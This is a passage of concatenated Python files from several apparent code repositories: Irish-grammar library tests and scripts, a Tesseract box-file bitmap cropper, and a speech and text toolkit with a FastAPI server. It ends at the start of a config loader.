sys.exit('--bunamo option not set')
bunamo = Path(args.bunamo)
if not bunamo.is_dir():
sys.exit(f'path "{args.bunamo}" is not a directory')
noun_dir = bunamo / 'noun'
if not noun_dir.is_dir():
sys.exit(f'"{args.bunamo}" does not contain noun/ directory')
for noun_file in noun_dir.glob('*.xml'):
n = Noun(source=noun_file)
if len(n.pl_nom) > 0 and len(n.pl_gen) > 0 and n.pl_nom[0].value == n.pl_gen[0].value:
for form in n.pl_nom:
if form.value.endswith('acha') or form.value.endswith('anna'):
print(f'{form.value}\t{form.value}í')
if __name__ == "__main__":
main()
```
#### File: pygramadan/scripts/test_possessives.py
```python
import argparse
from pygramadan.noun import Noun
from pygramadan.possessive import Possessive
from pygramadan.noun_phrase import NP
from pathlib import Path
import sys
_NOUNS = [
"árasán_masc1.xml",
"bó_fem.xml",
"comhlacht_masc3.xml",
"dealbh_fem2.xml",
"éiceachóras_masc1.xml",
"francfurtar_masc1.xml",
"fliúit_fem2.xml",
"fadhb_fem2.xml",
"fobhríste_masc4.xml",
"garáiste_masc4.xml",
"haematóma_masc4.xml",
"iasacht_fem3.xml",
"jab_masc4.xml",
"leabharlann_fem2.xml",
"máthair_fem5.xml",
"nóta_masc4.xml",
"ócáid_fem2.xml",
"pacáiste_masc4.xml",
"rás_masc3.xml",
"sobaldráma_masc4.xml",
"sábh_masc1.xml",
"stábla_masc4.xml",
"sráid_fem2.xml",
"tábhairne_masc4.xml",
"ubh_fem2.xml",
"x-gha_masc4.xml",
"zombaí_masc4.xml"
]
_POSS = [
"mo_poss.xml",
"do_poss.xml",
"a_poss_masc.xml",
"a_poss_fem.xml",
"ár_poss.xml",
"bhur_poss.xml",
"a_poss_pl.xml"
]
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-b", "--bunamo", type=str, help="path to BuNaMo")
args = parser.parse_args()
if args.bunamo is None:
sys.exit('--bunamo option not set')
bunamo = Path(args.bunamo)
if not bunamo.is_dir():
sys.exit(f'path "{args.bunamo}" is not a directory')
noun_dir = bunamo / 'noun'
if not noun_dir.is_dir():
sys.exit(f'"{args.bunamo}" does not contain noun/ directory')
poss_dir = bunamo / 'possessive'
if not poss_dir.is_dir():
sys.exit(f'"{args.bunamo}" does not contain possessive/ directory')
noun_files = [noun_dir / x for x in _NOUNS]
poss_files = [poss_dir / x for x in _POSS]
nouns = [Noun(source=f) for f in noun_files]
poss = [Possessive(source=f) for f in poss_files]
for noun in nouns:
for p in poss:
np = NP(noun=noun, possessive=p)
print(f'{p.get_identifier()}\t{np.sg_nom[0].value}\t{np.sg_gen[0].value}\t{np.pl_nom[0].value}\t{np.pl_gen[0].value}')
if __name__ == "__main__":
main()
```
#### File: pygramadan/tests/test_adjective.py
```python
from pygramadan.adjective import Adjective, example_xml
from pygramadan.forms import Form
from lxml.doctestcompare import LXMLOutputChecker, PARSE_XML
import io
BEAG_XML = example_xml()
def test_create():
sg_nom = [Form("beag")]
sg_gen_masc = [Form("big")]
sg_gen_fem = [Form("bige")]
pl_nom = [Form("beaga")]
graded = [Form("lú")]
abstract = [Form("laghad")]
beag = Adjective(disambig="",
declension=1,
sg_nom=sg_nom,
sg_gen_masc=sg_gen_masc,
sg_gen_fem=sg_gen_fem,
pl_nom=pl_nom,
graded=graded,
abstract=abstract)
assert beag is not None
def make_beag():
sg_nom = [Form("beag")]
sg_gen_masc = [Form("big")]
sg_gen_fem = [Form("bige")]
pl_nom = [Form("beaga")]
graded = [Form("lú")]
abstract = [Form("laghad")]
beag = Adjective(disambig="",
declension=1,
sg_nom=sg_nom,
sg_gen_masc=sg_gen_masc,
sg_gen_fem=sg_gen_fem,
pl_nom=pl_nom,
graded=graded,
abstract=abstract)
return beag
def test_get_lemma():
beag = make_beag()
assert beag.get_lemma() == 'beag'
def test_read_xml():
sio = io.StringIO(BEAG_XML)
beag = Adjective(source=sio)
assert beag.get_lemma() == 'beag'
def test_to_xml():
beag = make_beag()
xml = beag.to_xml()
checker = LXMLOutputChecker()
assert checker.check_output(BEAG_XML, xml, PARSE_XML) is True
def test_get_indentifier():
beag = make_beag()
assert beag.get_identifier() == 'beag_adj1'
def test_get_compar_pres():
beag = make_beag()
assert beag.get_compar_pres()[0].value == 'níos lú'
def test_get_super_pres():
beag = make_beag()
assert beag.get_super_pres()[0].value == 'is lú'
def test_get_compar_past():
beag = make_beag()
assert beag.get_compar_past()[0].value == 'ní ba lú'
dummy1 = Adjective(graded=[Form("adha")])
assert dummy1.get_compar_past()[0].value == "ní b'adha"
dummy2 = Adjective(graded=[Form("fusa")])
assert dummy2.get_compar_past()[0].value == "ní b'fhusa"
def test_get_super_past():
beag = make_beag()
assert beag.get_super_past()[0].value == 'ba lú'
dummy1 = Adjective(graded=[Form("adha")])
assert dummy1.get_super_past()[0].value == "ab adha"
dummy2 = Adjective(graded=[Form("fusa")])
assert dummy2.get_super_past()[0].value == "ab fhusa"
def test_get_all_forms():
beag = make_beag()
beag_list = beag.get_all_forms(abstract=False)
assert len(beag_list) == 5
exp1 = [('sg_nom', 'beag'), ('sg_gen_masc', 'big'), ('sg_gen_fem', 'bige'), ('pl_nom', 'beaga'), ('graded', 'lú')]
beag_list.sort()
exp1.sort()
assert beag_list == exp1
beag_list2 = beag.get_all_forms()
assert len(beag_list2) == 6
exp2 = exp1 + [('abstract', 'laghad')]
beag_list2.sort()
exp2.sort()
assert beag_list2 == exp2
```
#### File: pygramadan/tests/test_preposition.py
```python
from pygramadan.preposition import Preposition, get_example
from pygramadan.forms import Form
from lxml.doctestcompare import LXMLOutputChecker, PARSE_XML
import io
LE_XML = get_example()
def test_create():
le = Preposition(lemma="le",
disambig="",
sg1=[Form("liom")],
sg2=[Form("leat")],
sg3_masc=[Form("leis")],
sg3_fem=[Form("léi")],
pl1=[Form("linn")],
pl2=[Form("libh")],
pl3=[Form("leo")])
assert le is not None
def make_le():
le = Preposition(lemma="le",
disambig="",
sg1=[Form("liom")],
sg2=[Form("leat")],
sg3_masc=[Form("leis")],
sg3_fem=[Form("léi")],
pl1=[Form("linn")],
pl2=[Form("libh")],
pl3=[Form("leo")])
return le
def test_getlemma():
le = make_le()
assert le.get_lemma() == 'le'
def test_to_xml():
le = make_le()
xml = le.to_xml()
checker = LXMLOutputChecker()
assert checker.check_output(LE_XML, xml, PARSE_XML) is True
def test_read_xml():
sio = io.StringIO(LE_XML)
le = Preposition(source=sio)
assert le.get_lemma() == 'le'
assert le.sg3_masc[0].value == "leis"
def make_in_aice_le():
in_aice_le = Preposition(lemma="in aice le",
disambig="")
return in_aice_le
def test_get_identifier():
le = make_le()
assert le.get_identifier() == 'le_prep'
in_aice_le = make_in_aice_le()
assert in_aice_le.get_identifier() == 'in_aice_le_prep'
def test_is_empty():
le = make_le()
assert le.is_empty() is False
in_aice_le = make_in_aice_le()
assert in_aice_le.is_empty() is True
def test_get_all_forms():
le = make_le()
le_list = le.get_all_forms()
assert len(le_list) == 7
    exp = [('pl2', 'libh'), ('sg3_masc', 'leis'), ('pl1', 'linn'),
('pl3', 'leo'), ('sg2', 'leat'), ('sg1', 'liom'),
('sg3_fem', 'léi')]
le_list.sort()
exp.sort()
assert le_list == exp
```
#### File: pygramadan/tests/test_singular_info.py
```python
from pygramadan.singular_info import SingularInfo, SingularInfoO, SingularInfoA
from pygramadan.singular_info import SingularInfoAX, SingularInfoC, SingularInfoD
from pygramadan.singular_info import SingularInfoE
from pygramadan.attributes import Gender
from pygramadan.forms import Form
def test_singular_info():
si = SingularInfo(Gender.Fem,
nominative=[Form("bean")],
genitive=[Form("mná")],
vocative=[Form("bean")],
dative=[Form("mnaoi")])
assert si.nominative[0].value == 'bean'
to_s = "NOM: [bean] \nGEN: [mná] \nVOC: [bean] \nDAT: [mnaoi] \n"
assert si.__str__() == to_s
def test_singular_info_o():
si = SingularInfoO("test", Gender.Masc)
to_s = "NOM: [test] \nGEN: [test] \nVOC: [test] \nDAT: [test] \n"
assert si.__str__() == to_s
# This is where things start to happen
def test_singular_info_c():
si = SingularInfoC("marcach", Gender.Masc)
assert si.genitive[0].value == 'marcaigh'
assert si.vocative[0].value == 'marcaigh'
assert si.nominative[0].value == 'marcach'
assert si.dative[0].value == 'marcach'
si2 = SingularInfoC("cailleach", Gender.Fem)
assert si2.genitive[0].value == 'caillí'
assert si2.vocative[0].value == 'cailleach'
assert si2.nominative[0].value == 'cailleach'
assert si2.dative[0].value == 'cailleach'
def test_singular_info_e():
si = SingularInfoE("scrúdú", Gender.Masc)
assert si.genitive[0].value == 'scrúdaithe'
si = SingularInfoE("tarraingt", Gender.Fem)
assert si.genitive[0].value == 'tarraingthe'
def test_singular_info_a():
si = SingularInfoA("bagairt", Gender.Fem)
assert si.genitive[0].value == 'bagartha'
si = SingularInfoA("cionnroinnt", Gender.Fem, broadening_target="a")
assert si.genitive[0].value == 'cionnranna'
si = SingularInfoA("canúint", Gender.Fem)
assert si.genitive[0].value == 'canúna'
def test_singular_info_d():
si = SingularInfoD("cara", Gender.Masc)
assert si.genitive[0].value == 'carad'
si = SingularInfoD("fiche", Gender.Masc)
assert si.genitive[0].value == 'fichead'
def test_singular_info_ax():
si = SingularInfoAX("cathair", Gender.Fem, syncopation=True)
assert si.genitive[0].value == 'cathrach'
```
#### File: pygramadan/tests/test_verb.py
```python
from pygramadan.attributes import Mutation, VPPerson, VPPolarity, VPShape
from pygramadan.attributes import VPTense, VerbDependency, VerbMood
from pygramadan.attributes import VerbPerson, VerbTense
from pygramadan.verb import init_moods, init_tenses, Verb, get_example
from pygramadan.forms import Form
from lxml.doctestcompare import LXMLOutputChecker, PARSE_XML
import io
AIMSIGH_XML_FULL = get_example()
AIMSIGH_XML_BASIC = """
<verb default="aimsigh" disambig="">
<verbalNoun default="aimsiú" />
<verbalAdjective default="aimsithe" />
<tenseForm default="aimsigh" tense="Past" dependency="Indep" person="Base" />
<tenseForm default="aimsíomar" tense="Past" dependency="Indep" person="Pl1" />
<tenseForm default="aimsíodar" tense="Past" dependency="Indep" person="Pl3" />
<moodForm default="aimsíodh" mood="Imper" person="Base" />
<moodForm default="aimsím" mood="Imper" person="Sg1" />
<moodForm default="aimsigh" mood="Imper" person="Sg2" />
</verb>
"""
def test_read_xml():
sio = io.StringIO(AIMSIGH_XML_BASIC)
aimsigh = Verb(source=sio)
assert aimsigh.moods[VerbMood.Imper][VerbPerson.Sg2][0].value == 'aimsigh'
assert aimsigh.get_lemma() == 'aimsigh'
def make_aimsigh_basic():
tenses = init_tenses()
tenses[VerbTense.Past][VerbDependency.Indep][VerbPerson.Base].append(Form('aimsigh'))
tenses[VerbTense.Past][VerbDependency.Indep][VerbPerson.Pl1].append(Form('aimsíomar'))
tenses[VerbTense.Past][VerbDependency.Indep][VerbPerson.Pl3].append(Form('aimsíodar'))
moods = init_moods()
moods[VerbMood.Imper][VerbPerson.Base].append(Form('aimsíodh'))
moods[VerbMood.Imper][VerbPerson.Sg1].append(Form('aimsím'))
moods[VerbMood.Imper][VerbPerson.Sg2].append(Form('aimsigh'))
return Verb(verbal_noun=[Form('aimsiú')],
verbal_adj=[Form('aimsithe')],
tenses=tenses,
moods=moods)
def test_to_xml():
aimsigh = make_aimsigh_basic()
xml = aimsigh.to_xml()
checker = LXMLOutputChecker()
assert checker.check_output(AIMSIGH_XML_BASIC, xml, PARSE_XML) is True
def test_get_identifier():
aimsigh = make_aimsigh_basic()
assert aimsigh.get_identifier() == 'aimsigh_verb'
def test_default_tense_rule():
aimsigh = make_aimsigh_basic()
rules = aimsigh.get_tense_rules(VPTense.Past, VPPerson.Sg1, VPShape.Interrog, VPPolarity.Pos)
assert len(rules) == 1
assert rules[0].particle == 'ar'
assert rules[0].mutation == Mutation.Len1
_ABAIR_XML_FRAG = """
<verb default="abair" disambig="">
<verbalNoun default="rá" />
<verbalAdjective default="ráite" />
<tenseForm default="dúramar" tense="Past" dependency="Indep" person="Pl1" />
<moodForm default="abair" mood="Imper" person="Sg2" />
</verb>
"""
def test_default_rule_changes():
sio = io.StringIO(_ABAIR_XML_FRAG)
abair = Verb(source=sio)
rules = abair.get_tense_rules(VPTense.Past, VPPerson.Sg1, VPShape.Interrog, VPPolarity.Pos)
# it's a silly thing, but the matching is based on lemma, so if this fails, so does the rest
assert abair.get_lemma() == 'abair'
assert len(rules) == 1
# 'ar'/Len1 by default: see test_default_tense_rule()
assert rules[0].particle == 'an'
assert rules[0].mutation == Mutation.Ecl1x
def test_get_all_forms():
exp = [('cond_indep_auto', 'aimseofaí'), ('prescont_indep_sg1', 'aimsím'),
('pastcont_dep_sg2', 'aimsíteá'), ('fut_indep_pl1', 'aimseoimid'),
('prescont_dep_base', 'aimsíonn'), ('cond_dep_pl3', 'aimseoidís'),
('imper_pl2', 'aimsígí'), ('verbal_adj', 'aimsithe'),
('pastcont_dep_pl1', 'aimsímis'), ('pastcont_indep_auto', 'aimsítí'),
('verbal_noun', 'aimsiú'), ('past_indep_base', 'aimsigh'),
('past_dep_pl3', 'aimsíodar'), ('pastcont_indep_pl3', 'aimsídís'),
('past_indep_auto', 'aimsíodh'), ('fut_dep_pl1', 'aimseoimid'),
('cond_indep_pl3', 'aimseoidís'), ('fut_dep_auto', 'aimseofar'),
('prescont_indep_base', 'aimsíonn'), ('fut_indep_base', 'aimseoidh'),
('cond_indep_sg1', 'aimseoinn'), ('cond_dep_sg2', 'aimseofá'),
('imper_pl3', 'aimsídís'), ('subj_auto', 'aimsítear'),
('pastcont_indep_base', 'aimsíodh'), ('past_dep_auto', 'aimsíodh'),
('prescont_indep_auto', 'aimsítear'), ('prescont_indep_pl1', 'aimsímid'),
('pastcont_indep_pl1', 'aimsímis'), ('subj_pl1', 'aimsímid'),
('past_dep_base', 'aimsigh'), ('cond_dep_base', 'aimseodh'),
('past_dep_pl1', 'aimsíomar'), ('pastcont_dep_sg1', 'aimsínn'),
('subj_base', 'aimsí'), ('prescont_dep_sg1', 'aimsím'),
('cond_indep_base', 'aimseodh'), ('cond_dep_sg1', 'aimseoinn'),
('imper_sg1', 'aimsím'), ('imper_auto', 'aimsítear'),
('pastcont_indep_sg1', 'aimsínn'), ('cond_indep_sg2', 'aimseofá'),
('pastcont_indep_sg2', 'aimsíteá'), ('past_indep_pl3', 'aimsíodar'),
('fut_indep_auto', 'aimseofar'), ('fut_dep_base', 'aimseoidh'),
('pastcont_dep_base', 'aimsíodh'), ('past_indep_pl1', 'aimsíomar'),
('imper_pl1', 'aimsímis'), ('pastcont_dep_pl3', 'aimsídís'),
('cond_dep_pl1', 'aimseoimis'), ('cond_indep_pl1', 'aimseoimis'),
('imper_base', 'aimsíodh'), ('imper_sg2', 'aimsigh'),
('prescont_dep_pl1', 'aimsímid'), ('cond_dep_auto', 'aimseofaí'),
('pastcont_dep_auto', 'aimsítí'), ('prescont_dep_auto', 'aimsítear')]
sio = io.StringIO(AIMSIGH_XML_FULL)
aimsigh = Verb(source=sio)
aimsigh_list = aimsigh.get_all_forms()
aimsigh_list.sort()
exp.sort()
assert aimsigh_list == exp
def test_get_unique_forms():
exp = ['aimsítear', 'aimseoidh', 'aimsíteá', 'aimsigh', 'aimsí',
'aimsíodar', 'aimsímis', 'aimseoimid', 'aimsímid', 'aimseofar',
'aimseoinn', 'aimsítí', 'aimsíodh', 'aimseoidís', 'aimseodh',
'aimsíomar', 'aimsithe', 'aimseofá', 'aimsídís', 'aimsím',
'aimsíonn', 'aimseofaí', 'aimsiú', 'aimseoimis', 'aimsígí',
'aimsínn']
sio = io.StringIO(AIMSIGH_XML_FULL)
aimsigh = Verb(source=sio)
aimsigh_list = aimsigh.get_unique_forms()
aimsigh_list.sort()
exp.sort()
assert aimsigh_list == exp
``` |
{
"source": "jimregan/tesseract-gle-uncial",
"score": 3
} |
#### File: scripts/python/makeBitmaps.py
```python
import string,time
import codecs
from os import curdir, sep, mkdir, makedirs, path
from subprocess import Popen, PIPE, STDOUT
import lib # my local test lib.py
def main():
print("Hello!")
inputFileName = 'aibitir.box' #'semicolon.box' #'gle-test2.testfont.box'
inputWidth = 1200 #2985 #924
inputHeight = 1800 #4269 #1600
if not path.exists("bitmaps"):
mkdir("bitmaps")
#READ A .BOX FILE
f = codecs.open(inputFileName, 'r', "utf-8-sig")
if not f:
print("Input file " + inputFileName + " not found!")
exit(1)
g = codecs.open("bitmaps/charinfo.utf8", 'w', "utf-8-sig")
if not g:
print("Unable to open output file bitmaps/charinfo.utf8")
exit(1)
linecount = 0
while True:
line = f.readline()
if not line: break
linecount = linecount + 1
#print(line)
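        # Each line of the Tesseract .box file is expected to look like:
        #   <glyph> <x1> <y1> <x2> <y2> <page>
        # with coordinates measured from the bottom-left corner of the page image,
        # which is why the y offset is flipped against inputHeight below.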
c,x1,y1,x2,y2,pageNum = line.split()
#print("x1="+x1+" y1="+y1+" x2="+x2+" y2="+y2)
width = int(x2) - int(x1)
height = int(y2) - int(y1)
xoff = int(x1) - 1 # -1 is weird, does it work for all? TODO check
yoff = inputHeight - 1 - int(y2)
#print("width="+str(width)+" height="+str(height))
outname = "bitmaps" +"/"+lib.lettername(c)+".tif"
#print("outname="+outname)
#cmdline = "convert gle-test2.testfont.tif -crop "+str(width)+"x"+str(height)+"+"+str(xoff)+"+"+str(yoff)+" "+outname
#cmdline = "convert semicolon.tif -crop "+str(width)+"x"+str(height)+"+"+str(xoff)+"+"+str(yoff)+" "+outname
cmdline = "convert aibitir.tif -crop "+str(width)+"x"+str(height)+"+"+str(xoff)+"+"+str(yoff)+" "+outname
print("cmdline=["+cmdline+"]")
p1 = Popen(cmdline, shell=True, stdout=PIPE, stderr=STDOUT)
output = p1.communicate()[0].decode()
if p1.returncode != 0:
print("returncode="+str(p1.returncode))
print(output)
g.write(c + " " + str(width) + " " + str(height) + " " + "0" + "\n") # 0 is just a default y-offset
    f.close()
    g.close()
print("linecount = " + str(linecount))
if __name__ == '__main__':
main()
``` |
{
"source": "jimregan/tmh",
"score": 3
} |
#### File: tests/test_speech/test_tts.py
```python
from tmh.speech.tacotron import Tacotron2
import unittest
import os
class TestFlows(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.text_sentences = [{
"text": "Room 509 is full of awesome people!",
"filename": "509.wav"
}]
cls.tacotron2 = Tacotron2()
def test_tacotron2(self):
"""
Test tacotron 2 speech synthesis.
"""
for text in self.text_sentences:
self.tacotron2.synthesize(text["text"], text["filename"])
self.assertTrue(os.path.exists(
os.path.join(os.getcwd(), text["filename"])))
os.remove(os.path.join(os.getcwd(), text["filename"]))
```
#### File: tmh/tmh/get_image.py
```python
import requests
import json
import random
def get_random_integer(number):
"""
This function takes in a number and returns a random integer between 0 and that number
"""
return random.randint(0, number)
def get_meme(keyword):
"""
This function takes in a keyword and returns a url of a meme
"""
url = "http://api.giphy.com/v1/gifs/search?q=" + keyword + "&api_key=dc6zaTOxFJmzC&limit=10"
response = requests.get(url)
data = json.loads(response.text)
    return data['data'][get_random_integer(len(data['data']) - 1)]['images']['original']['url']
meme = get_meme("turtles")
print(meme)
```
#### File: tmh/tmh/overlap.py
```python
from pyannote.audio.pipelines import OverlappedSpeechDetection
HYPER_PARAMETERS = {
# onset/offset activation thresholds
"onset": 0.5, "offset": 0.5,
# remove speech regions shorter than that many seconds.
"min_duration_on": 0.0,
# fill non-speech regions shorter than that many seconds.
"min_duration_off": 0.0
}
pipeline = OverlappedSpeechDetection(segmentation="pyannote/segmentation")
def overlap_detection(audio_path):
pipeline.instantiate(HYPER_PARAMETERS)
overlap = pipeline(audio_path)
# print("extracting overlap")
print(overlap)
return(overlap.for_json())
# file_path = "./test.wav"
# output = overlap_detection(file_path)
# print(output)
```
#### File: tmh/speech/tacotron.py
```python
import torch
import torch.nn as nn
import torchaudio
# from BaseSpeechModel import BaseSpeechModel
from .base_speech_model import BaseSpeechModel
device = 'cuda' if torch.cuda.is_available() else 'cpu'
class Tacotron2(BaseSpeechModel):
def __init__(self):
super(Tacotron2, self).__init__()
self.model = self.load_model()
self.vocoder = self.load_vocoder()
self.text_normalizer = self.get_text_utils()
self.sample_rate = 22050
def load_model(self):
r"""
Loads tacotron 2
"""
tacotron2 = torch.hub.load(
'NVIDIA/DeepLearningExamples:torchhub', 'nvidia_tacotron2', model_math='fp16')
tacotron2 = tacotron2.to(device)
tacotron2.eval()
return tacotron2
def load_vocoder(self):
r"""
Loads waveglow
"""
waveglow = torch.hub.load(
'NVIDIA/DeepLearningExamples:torchhub', 'nvidia_waveglow', model_math='fp16')
waveglow = waveglow.remove_weightnorm(waveglow)
waveglow = waveglow.to(device)
waveglow.eval()
return waveglow
def get_text_utils(self):
r"""
Download text preprocessing utils
"""
return torch.hub.load(
'NVIDIA/DeepLearningExamples:torchhub', 'nvidia_tts_utils')
def write_to_file(self, filename, data):
r"""
Write numpy array of audio content to file
Args:
filename (str): final output filename
data (torch.tensor): audio data
"""
data = self.push_to_cpu(data)
torchaudio.save(filename, data, self.sample_rate)
def synthesize(self, text, filename):
r"""
Main function to use for text synthesise
Args:
text (str): text to convert to audio
filename (str): final output filename
Usage:
```
>>> from tmh.speech.tacotron import Tacotron2
>>> tacotron = Tacotron2()
>>> text = "Hello"
>>> filename = "test.wav"
>>> tacotron.synthesize(text, filename)
```
"""
sequences, lengths = self.text_normalizer.prepare_input_sequence([
text])
with torch.no_grad():
mel, _, _ = self.model.infer(sequences, lengths)
audio = self.vocoder.infer(mel)
self.write_to_file(filename, audio)
```
#### File: tmh/text/ner.py
```python
from transformers import pipeline
models = {
'kb-ner': 'KB/bert-base-swedish-cased-ner',
"swedish-wikiann": "birgermoell/ner-swedish-wikiann"
}
def named_entity_recognition(text, model='KB/bert-base-swedish-cased-ner', tokenizer='KB/bert-base-swedish-cased-ner'):
"""
Named entity recognition
"""
# Load the model
ner = pipeline('ner', model=model, tokenizer=tokenizer)
# Get the result
result = ner(text)
    # Return the result
return result
# ner = named_entity_recognition('KTH är ett universitet i Stockholm')
# print(ner)
```
#### File: tmh/text/translate.py
```python
from transformers import AutoTokenizer, AutoModelWithLMHead, AutoModelForSeq2SeqLM, TranslationPipeline, pipelines
def translate_text(text, model="SEBIS/legal_t5_small_trans_sv_en_small_finetuned", tokenizer="SEBIS/legal_t5_small_trans_sv_en_small_finetuned"):
pipeline = TranslationPipeline(
model=AutoModelWithLMHead.from_pretrained(model),
tokenizer=AutoTokenizer.from_pretrained(pretrained_model_name_or_path = tokenizer, do_lower_case=False,
skip_special_tokens=True))
translation = pipeline(text, max_length=512)
return translation
def translate_between_languages(text, model):
tokenizer = AutoTokenizer.from_pretrained(model)
model = AutoModelForSeq2SeqLM.from_pretrained(model)
translated = model.generate(**tokenizer(text, return_tensors="pt", padding=True))
output = [tokenizer.decode(t, skip_special_tokens=True) for t in translated]
# print(output)
return output[0]
# sv_text = "<NAME> var son till Hermann och <NAME>, vilka var icke-religiösa judar och tillhörde medelklassen. Fadern var försäljare och drev senare en elektroteknisk fabrik. Familjen bosatte sig 1880 i München där Einstein gick i en katolsk skola. Mängder av myter cirkulerar om <NAME>ins person. En av dessa är att han som barn skulle ha haft svårigheter med matematik, vilket dock motsägs av hans utmärkta betyg i ämnet.[15] Han nämnde ofta senare att han inte trivdes i skolan på grund av dess pedagogik. Att <NAME> skulle vara släkt med musikvetaren <NAME> är ett, ofta framfört, obevisat påstående. A<NAME> dotter Eva har framhållit att något sådant släktskap inte existerar."
# translation = translate_text(sv_text)
# print(translation)
```
#### File: web/backend/server.py
```python
from re import template
from typing import Optional
from fastapi import FastAPI
from pydantic import BaseModel
from starlette.middleware.cors import CORSMiddleware
from fastapi.staticfiles import StaticFiles
from tmh.text.text_generation import generate_text
import uvicorn
class TextRequest(BaseModel):
text: str
class Config:
schema_extra = {
"example": {
"text": "KTH är ett universitet i Stockholm",
}
}
class SummaryRequest(BaseModel):
text: str
class Config:
schema_extra = {
"example": {
"text": "<NAME> var son till Hermann och <NAME>, vilka var icke-religiösa judar och tillhörde medelklassen. Fadern var försäljare och drev senare en elektroteknisk fabrik. Familjen bosatte sig 1880 i München där Einstein gick i en katolsk skola. Mängder av myter cirkulerar om <NAME> person. En av dessa är att han som barn skulle ha haft svårigheter med matematik, vilket dock motsägs av hans utmärkta betyg i ämnet.[15] Han nämnde ofta senare att han inte trivdes i skolan på grund av dess pedagogik. Att <NAME> skulle vara släkt med musikvetaren <NAME> är ett, ofta framfört, obevisat påstående. <NAME> dotter Eva har framhållit att något sådant släktskap inte existerar."
}
}
class ZeroShotRequest(BaseModel):
sequence: str
labels: list
class Config:
schema_extra = {
"example": {
"sequence": "one day I will see the world",
"labels": ['travel', 'cooking', 'dancing']
}
}
class GenerateRequest(BaseModel):
text: str
model: Optional[str] = None
max_length: Optional[int] = None
temperature: Optional[float] = None
class Config:
schema_extra = {
"example": {
"text": "Det var en gång",
"model": "birgermoell/swedish-gpt",
"max_length": 250,
"temperature": 0.9
}
}
class QaRequest(BaseModel):
question: str
context: str
class Config:
schema_extra = {
"example": {
"question": "What is the meaning of life?",
"context": "The meaning of life is to be happy",
}
}
class PhonemeRequest(BaseModel):
text: str
language: str
model: Optional[str] = None
class Config:
schema_extra = {
"example": {
"text": "Tal, <NAME> är en underbar plats.",
"language": "Swedish",
}
}
app = FastAPI()
origins = [
"http://localhost.tiangolo.com",
"https://localhost.tiangolo.com",
"http://localhost",
"http://localhost:3000",
"http://localhost:3001",
"http://localhost:3002",
"http://localhost:3003",
"http://localhost:3000",
"http://localhost:8080",
"http://127.0.0.1:8000/"
]
app.add_middleware(
CORSMiddleware,
allow_origins=origins,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"]
)
app.mount("/models", StaticFiles(directory="models"), name="models")
@app.get("/")
def read_root():
return {"Hello": "World"}
@app.post("/generate")
async def generate_response(generateRequest: GenerateRequest):
print("inside with reequest")
print(generateRequest)
if generateRequest.model:
response = generate_text(
model=generateRequest.model,
prompt=generateRequest.text,
max_length=generateRequest.max_length,
temperature=generateRequest.temperature,
)
else:
response = generate_text(model='birgermoell/swedish-gpt', prompt=generateRequest.text, max_length=250, temperature=0.9)
print("response is", response)
#print("the response is", response)
return {
"text": response }
@app.post("/ner")
async def ner_response(textRequest: TextRequest):
from tmh.text.ner import named_entity_recognition
ner = named_entity_recognition(textRequest.text)
print(ner)
cleaned = []
for item in ner:
item['score'] = float(item['score'])
item['start'] = int(item['start'])
item['end'] = int(item['end'])
cleaned.append(item)
return {
"ner": cleaned
}
@app.post("/qa")
async def qa_response(qaRequest: QaRequest):
from tmh.text.question_answering import get_answer
answer = get_answer({'question': qaRequest.question, 'context': qaRequest.context})
print("the answer response is", answer)
return answer
@app.post("/zero_shot")
async def zero_shot_response(zeroShotRequest: ZeroShotRequest):
from tmh.text.zero_shot import get_zero_shot_classification
classified_label = get_zero_shot_classification(zeroShotRequest.sequence, zeroShotRequest.labels)
print("the classified label response is", classified_label)
return classified_label
@app.post("/translate_and_summarize")
async def translate_and_summarize_response(summaryRequest: SummaryRequest):
from tmh.text.summarization import translate_and_summarize
swedish_summary = translate_and_summarize(summaryRequest.text)
print(swedish_summary)
return swedish_summary
@app.post("/phonemize")
async def phonemize_response(phonemeRequest: PhonemeRequest):
print("inside phonemize with", phonemeRequest)
from tmh.phonemes import get_phonemes
# import pdb
# pdb.set_trace()
phoneme_models = {
"English": "models/en_us_cmudict_ipa_forward.pt",
"Swedish": "models/best_model_no_optim.pt"
}
phonemes = get_phonemes(phonemeRequest.text, phoneme_models[phonemeRequest.language], language=phonemeRequest.language)
print(phonemes)
return phonemes
if __name__ == "__main__":
uvicorn.run(app, host="0.0.0.0", port=4000)
``` |
{
"source": "jimrkh/temperature-logger",
"score": 3
} |
#### File: jimrkh/temperature-logger/temperature-logger.py
```python
import time
from datetime import datetime
import schedule
from influxdb import InfluxDBClient
from w1thermsensor import W1ThermSensor
from config import (
SCHEDULE_TIME_DELTA,
INFLUXDB_HOST, INFLUXDB_PORT, INFLUXDB_DB, INFLUXDB_NAME, INFLUXDB_PASSWD,
SENSOR_LOCATIONS_NA, SENSOR_LOCATIONS
)
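# For reference, config.py is expected to provide values along these lines
# (everything below is a placeholder, not the real configuration):
#
#   SCHEDULE_TIME_DELTA = 60                      # seconds between readings
#   INFLUXDB_HOST, INFLUXDB_PORT = "localhost", 8086
#   INFLUXDB_DB, INFLUXDB_NAME, INFLUXDB_PASSWD = "sensors", "logger", "secret"
#   SENSOR_LOCATIONS_NA = "unknown"
#   SENSOR_LOCATIONS = {"0316a279f8ff": "garage"}  # sensor id -> location label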
def job():
measurement_list = []
for sensor in W1ThermSensor.get_available_sensors():
measurement_value = sensor.get_temperature(W1ThermSensor.DEGREES_C)
measurement_time = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')
measurement = {
"measurement": "temperature_sensor",
"tags": {
"id": sensor.id,
# "prefix": sensor.slave_prefix,
# "path": sensor.sensorpath,
"device_name": sensor.type_name,
"device_type": sensor.type,
"location": SENSOR_LOCATIONS.get(sensor.id,SENSOR_LOCATIONS_NA),
"unit": "C",
},
"time": measurement_time,
"fields": {
"value": measurement_value,
},
}
print("Sensor %s has temperature %.2f at %s" % (sensor.id, measurement_value, measurement_time))
measurement_list.append(measurement)
db_client = InfluxDBClient(INFLUXDB_HOST, INFLUXDB_PORT, INFLUXDB_NAME, INFLUXDB_PASSWD, INFLUXDB_DB)
db_client.write_points(measurement_list)
def main():
schedule.every(SCHEDULE_TIME_DELTA).seconds.do(job)
while True:
schedule.run_pending()
time.sleep(1)
if __name__ == "__main__":
main()
``` |
{
"source": "jimr/noterator",
"score": 3
} |
#### File: noterator/noterator/config.py
```python
import os
try:
from ConfigParser import SafeConfigParser as ConfigParser
except ImportError: # py3k
from configparser import ConfigParser
class ConfigurationError(Exception):
pass
def load_config(fname=None):
"""Load and return configuration from a file.
Args:
